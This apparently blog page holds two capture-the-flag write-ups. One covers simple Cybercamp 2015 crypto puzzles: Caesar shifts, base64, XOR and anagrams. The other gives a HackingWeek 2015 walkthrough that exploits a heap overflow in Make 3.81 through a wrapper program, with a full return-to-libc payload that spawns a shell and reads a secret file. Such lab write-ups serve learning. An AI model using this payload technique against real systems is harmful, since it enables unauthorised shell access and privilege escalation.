All posts by Hackndo

[Cybercamp 2015] [Crypto 1-9] Write Up

Hi guys, since the first crypto challenges were quite easy, I’ll wrap the first of them in this write-up.

Crypto 1

Ciphered message : DWDFDUIORWDHHXX

This was a really simple Caesar cipher. All letters were shifted 3 times. A became D, W became A and so on.

Deciphered message : ATACARFLOTAEEUU

Crypto 2

Ciphered message : VCXRKFRQLCDLCKZTFCFI

With a Caesar deciphering with a shift of 17 letters :
Deciphered message : ELGATOAZULMULTICOLOR

Crypto 3

Ciphered message : BZHUBTLYVZPTWHYLZFXWLTL

First, we found a custom Caesar cipher, with a shift of 7 letters, giving :

USANUMEROSIMPARESYQPEME

Meaning : Use odd numbers YQPEME

I didn’t understand why they talked about odd numbers, because the last word was a progressive Caesar cipher : Q was shifted by 20 letters, then the shift was increased by 2 for each letter.

Deciphered message : USA NUMEROS IMPARES EUREKA

Crypto 4

Some criminals use a text as a seed for their ciphering keys. Can we find the keys using the following text ? The key words are in bold :

Plantilla: El texto dramático, por lo tanto, es aquel que representa
algún conflicto de la vida a partir del diálogo entre los personajes. La
noción de drama permite nombrar, en forma genérica, a cualquier obra escrita
por un dramaturgo donde los hechos tienen lugar en un espacio y tiempo
determinados.

By looking at their position in the text, we find :

2 3 5 7 11

These are the first prime numbers. If we keep following this logic, we then have :

2 3 5 7 11 13 17 19 23 29 31 37 41 43 47

And by concatenation of the corresponding words, we have the key :

Deciphered key : textodramaticoloesalgundepartirdialogolaengenericaunhechoslugary

Crypto 5

Ciphered message : YUc5c1lXMTFibVJ2

After a double base 64 decode, we get the answer

Deciphered message : holamundo

Crypto 6

a XOR b = 0x35
b XOR C = 0x15

a XOR c = ?

This is some easy XOR calculation.

(a XOR b) XOR (b XOR c) = 0x35 XOR 0x15

a XOR (b XOR b) XOR c = 0x20

a XOR c = 0x20

Crypto 7

Ciphered message : CHECO VERMO ORAAH

These were some basic anagrams.

Deciphered message : COCHE MOVER AHORA

(Move car now)

Crypto 9

Find the following row :
RO: 0000 1000 0100 1010 (Initial seed)
R1: 0001 0000 1001 0100
R2: 0100 0010 0101 0000
R3: 0001 0010 1000 00-0
R4: 0101 0000 0100 0010
R5: 0100 0010 0101 0000
R6: ?

We notice that each row is like the first one, but shifted.

R1 is shifted by 2 on the left

R2 is shifted by 3 on the left

then 5, 8. This is Fibonacci. So next line will be shifted by 13

0000 1000 0100 1010

[HackingWeek 2015] [Exploit5] Write Up

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <string.h>

int
main(int argc, char ** argv)
{
  char * make_path = "/home/exploit05/project/make";
  char * path_prefix = "/home/exploit05/project/";

  /* Checking if there is an argument, fail if not */
  if (argc < 2)
    {
      fprintf (stderr,
         "safe-run: error: missing argument\n"
         "usage: safe-run MAKEFILE_PATH\n");
      exit(EXIT_FAILURE);
    }

  /* Check if the given path has '..' inside */
  if (strstr(argv[1], ".."))
    {
      fprintf (stderr,
         "safe-run: detected an attempt to escape the directory !\n");
      exit(EXIT_FAILURE;)
    }

  /* Concatenate path_prefix and argv[1] */
  char *makefile_path = malloc(strlen(path_prefix) + strlen(argv[1]) + 1);

  strcpy(makefile_path, path_prefix);
  strcat(makefile_path, argv[1]);

  printf("command: %s -f %s\n", make_path, makefile_path);

  /* Calling execve() */
  char * args[4] = { make_path, "-f", makefile_path, 0 };
  char * envp[1] = { 0 };

  execve(make_path, args, envp);

  /* In case the execve is failing */
  return EXIT_FAILURE;
}

Make is called in the execve() call at the end of source code.
We tried some make vulnerabilities, and found this Make 3.81 Heap Overflow.

After one try, we found out it was vulnerable :

$ gdb
(gdb) file make
(gdb) set disassembly-flavor intel
(gdb) r $(perl -e 'print "A"x4126')

(gdb) i r
eip            0x792e4141   0x792e4141              //EIP partially rewritten

We need to add 2 “A” so our buffer length + EBP + EIP registers looks like this  :

[ 4120 A ] [ 4 EBP ] [ 4 EIP] = 4128

We gather some other informations :

guest@ns314076:/home/exploit05/project$ readelf -l safe-run
Elf file type is EXEC (Executable file)
Entry point 0x8048500
There are 8 program headers, starting at offset 52

Program Headers:
Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
[...]
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4         //RW, not X

Since environment is emptied before calling make, stack is not executable and ASLR is disabled, we’ll try a return to libc exploitation. We first find system() address

(gdb) p system
$1 = {<text variable, no debug info>} 0x4006ac30 <system>

So we push system() address on the stack, preceded by a random address (return from system() ), and before that, arguments to system. Here, the only argument is a string containing ‘sh;’. We just put this string in our buffer, and after a quick dichotomous analysis, we find its address.

/home/exploit05/project/safe-run $(perl -e 'print "A"x2062 . "sh;" . "B" x2059  ."\x30\xac\x06\x40" . "AAAA" . "\xc4\xf7\xff\xbf"')

sh-4.2$ whoami
exploit05
sh-4.2$ cat /home/exploit05/.secret
EiN5ohqu5Ush-4.2$

The flag is : EiN5ohqu5U